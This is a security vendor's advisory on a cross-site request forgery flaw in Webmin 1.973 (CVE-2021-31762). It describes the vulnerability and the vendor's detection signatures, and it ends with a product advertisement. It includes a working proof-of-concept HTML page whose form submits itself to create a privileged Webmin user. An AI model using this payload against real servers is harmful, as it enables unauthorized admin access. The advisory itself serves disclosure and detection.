Webmin 1.973 'Create Admin User' Cross-Site Request Forgery



Application Details

Webmin is a web-based system administration tool for Unix-like servers and services. It has over 1,000,000 installations worldwide. Utilising Webmin, it is possible to configure operating system internals such as, users, disk quotas, services, or configuration files, as well as modify, and control open-source apps such as BIND DNS Server, Apache HTTP Server, PHP, MySQL, and many more.


Vulnerability

Webmin is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input by the add users feature.


Identification

By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to create a privileged user. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://target/acl/save_user.cgi" method="POST">
      <input type="hidden" name="name" value="name123" />
      <input type="hidden" name="pass_def" value="0" />
      <input type="hidden" name="pass" value="password123" />
      <input type="hidden" name="mod" value="usermin" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


Detection

By turning this into traffic files and matching rules, we are able to detect attempts to create an admin user via CSRF.


Coverage

Idappcom has created signatures 8021569 and 8021570 along with traffic files.


References

Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery - Exploit Database

Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery - Packet Storm Security

CVE-2021-31762


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can share your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional